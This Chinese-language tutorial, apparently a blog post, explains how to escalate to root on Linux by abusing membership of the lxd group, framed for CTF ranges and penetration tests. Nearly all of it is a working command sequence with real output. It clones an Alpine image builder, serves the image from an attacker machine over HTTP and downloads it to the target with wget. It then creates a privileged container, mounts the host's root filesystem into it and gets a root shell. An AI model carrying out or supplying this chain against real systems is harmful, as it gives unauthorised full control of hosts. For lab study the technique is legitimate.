利用LXD实现本地提权
LXD简介
LXD 是基于LXC容器的管理程序(hypervisor),它由开发 Ubuntu 的公司 Canonical 创建和维护。它由3个组建构成:
lxd:系统守护进程,它导出能被本地和网络访问的 RESTful APIlxc:客户端命令行,它能跨网络管理多个容器主机。nova-compute-lxd: OpenStack Nova 插件,它使 OpenStack 如虚拟机一般,管理容器。
提权前提条件
在各种靶场或者渗透测试中会遇到利用lxd进行本地提权的场景,需要满足以下两个条件:
-
已经获得目标主机的Shell;
-
用户率属于lxd组
提权具体步骤
-
从网上下载或者git clone文件:
git clone https://github.com/saghul/lxd-alpine-builder.git -
攻击机比如Kali Linux本地开启HTTP服务,将alpine-v3.13-x86_64-20210218_0139.tar.gz上传至目标主机的/tmp目录(因为该目录有读写权限):
python -m http.serversysadmin@kb-server:/tmp$ wget http://192.168.56.206:8000/alpine.tar.gz --2022-12-31 01:16:27-- http://192.168.56.206:8000/alpine.tar.gz Connecting to 192.168.56.206:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 3259593 (3.1M) [application/gzip] Saving to: ‘alpine.tar.gz’ alpine.tar.gz 100%[=====================================================>] 3.11M --.-KB/s in 0.01s 2022-12-31 01:16:27 (260 MB/s) - ‘alpine.tar.gz’ saved [3259593/3259593] sysadmin@kb-server:/tmp$ ls alpine.tar.gz -
将alpine镜像导入lxd,并验证导入是否成功
sysadmin@kb-server:/tmp$ lxc image import ./alpine.tar.gz --alias myimage Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892bsysadmin@kb-server:/tmp$ lxc image list +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE | +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ | myimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Dec 31, 2022 at 1:17am (UTC) | +---------+--------------+--------+-------------------------------+--------+--------+------------------------------+ -
运行命令:
sysadmin@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
但是可能会报一下错误:
sysadmin@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
Error: No storage pool found. Please create a new storage pool
这是因为lxc没有初始化,只需利用lxd init命令初始化一下即可,一路回车:
sysadmin@kb-server:/tmp$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
此时再初始化镜像:
sysadmin@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
-
然后将目标主机(靶机)的根目录挂载到镜像里的/mnt/root目录下:
sysadmin@kb-server:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true Device mydevice added to ignite -
进入镜像,从而可以访问目标主机里的文件系统
sysadmin@kb-server:/tmp$ lxc start ignite sysadmin@kb-server:/tmp$ lxc exec ignite /bin/sh ~ # id uid=0(root) gid=0(root)